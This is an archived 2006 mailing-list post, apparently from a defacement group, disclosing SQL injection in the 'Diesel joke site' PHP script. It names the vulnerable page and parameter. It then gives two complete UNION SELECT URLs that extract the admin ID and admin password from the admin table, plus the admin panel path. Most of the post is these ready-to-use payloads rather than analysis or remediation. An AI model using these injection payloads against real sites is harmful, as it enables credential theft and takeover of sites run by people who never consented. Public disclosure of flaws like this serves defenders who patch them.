Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

From: "black code" <black-cod3@hotmail.com.>
To: [email protected], [email protected],
Subject: Sql injection in Diesel joke site script
Date: Sat, 01 Jul 2006 17:52:09 +0300
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 01 Jul 2006 14:52:11.0417 (UTC) FILETIME=[EEE40090:01C69D1D]
X-Virus-Scanned: antivirus-gw at tyumen.ru

Sql injection in Diesel joke site

forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection

####################################################
Sql injection in Diesel joke site

page : category.php

variable : id

####################################################
Exploits :

admin id:
http://www.example.com/path to joke 
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*

pass:
http://www.example.com/path to joke 
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%20admin/*

aid= admin id
apass= pass of the admin
####################################################

path to admin panel :

http://www.example.com/path to jokes/admin

#######################
emails:

[email protected]  &  [email protected]
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: